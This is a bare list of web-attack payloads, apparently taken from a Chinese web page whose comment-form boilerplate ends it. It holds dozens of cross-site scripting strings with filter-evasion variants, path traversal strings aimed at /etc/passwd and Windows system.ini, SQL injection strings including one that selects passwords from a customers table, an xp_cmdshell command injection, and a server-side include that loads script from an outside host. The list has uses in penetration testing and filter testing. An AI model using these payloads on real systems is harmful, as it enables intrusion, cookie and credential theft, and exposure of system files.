'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3cscript%3ealert('xss')%3c/script%3e
<script>alert('xss')</script>
<img src="javascript:alert('xss')">
%0a%0a<script>alert(\"vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/
%3f.jsp
%3f.jsp
<script>alert('vulnerable');</script>
<script>alert('vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('vulnerable')</script>
a/
a?<script>alert('vulnerable')</script>
"><script>alert('vulnerable')</script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3e%3cscript%3ealert(document.cookie)%3c/script%3e
%3cscript%3ealert(document. domain);%3c/script%3e&
%3cscript%3ealert(document.domain);%3c/script%3e&session_id={session_id}&session_id=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<xss>=&{()}
<img src="javascript:alert('xss');">
<img src=javascript:alert('xss')>
<img src=javascript:alert('xss')>
<img src=javascript:alert("xss")>
<img src=javascript:alert('XSS')>
<img src=javascript:alert('XSS')>
<img src=javascript:alert('XSS')>
<img src="jav ascript:alert('xss');">
<img src="jav
ascript:alert('xss');">
<img src="jav
ascript:alert('xss');">
"<img src=java\0script:alert(\"xss\")>";' > out
<img src=" javascript:alert('xss');">
<script>a=/xss/alert(a.source)</script>
<body background="javascript:alert('xss')">
<body onload=alert('xss')>
<img dynsrc="javascript:alert('xss')">
<img lowsrc="javascript:alert('xss')">
<bgsound src="javascript:alert('xss');">
<br size="&{alert('xss')}">
<layer src=""></layer>
<link rel="stylesheet" href="javascript:alert('xss');">
<img src='vbscript:msgbox("xss")'>
<img src="mocha:[code]">
<img src="livescript:[code]">
<meta http-equiv="refresh" content="0;url=javascript:alert('xss');">
<iframe src=javascript:alert('xss')></iframe>
<frameset><frame src=javascript:alert('xss')></frame></frameset>
<table background="javascript:alert('xss')">
<div style="background-image: url(javascript:alert('xss'))">
<div style="behaviour: url(');">
<div style="width: expression(alert('xss'));">
<style>@im\port'\ja\vasc\ript:alert("xss")';</style>
<img style='xss:expre\ssion(alert("xss"))'>
<style type="text/javascript">alert('xss');</style>
<style type="text/css">.xss{background-image:url("javascript:alert('xss')");}</style><a class=xss></a>
<style type="text/css">body{background:url("javascript:alert('xss')")}</style>
<base href="javascript:alert('xss');//">
geturl("javascript:alert('xss')")
a="get";b="url";c="javascript:";d="alert('xss');";eval(a+b+c+d);
<xml src="javascript:alert('xss');">
"> <body onload="a();"><script>function a(){alert('xss');}</script><"
<script src=""></script>
<img src="javascript:alert('xss')"
<!--#exec cmd="/bin/echo '<script src'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></script>'"-->
<img src="">
<script a=">" src=""></script>
<script =">" src=""></script>
<script a=">" '' src=""></script>
<script "a='>'" src=""></script>
<script>document.write("<scri");</script>pt src=""></script>
<a href=http://www.go>link</a>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
如对本文有疑问,
点击进行留言回复!!
我要评论
网友评论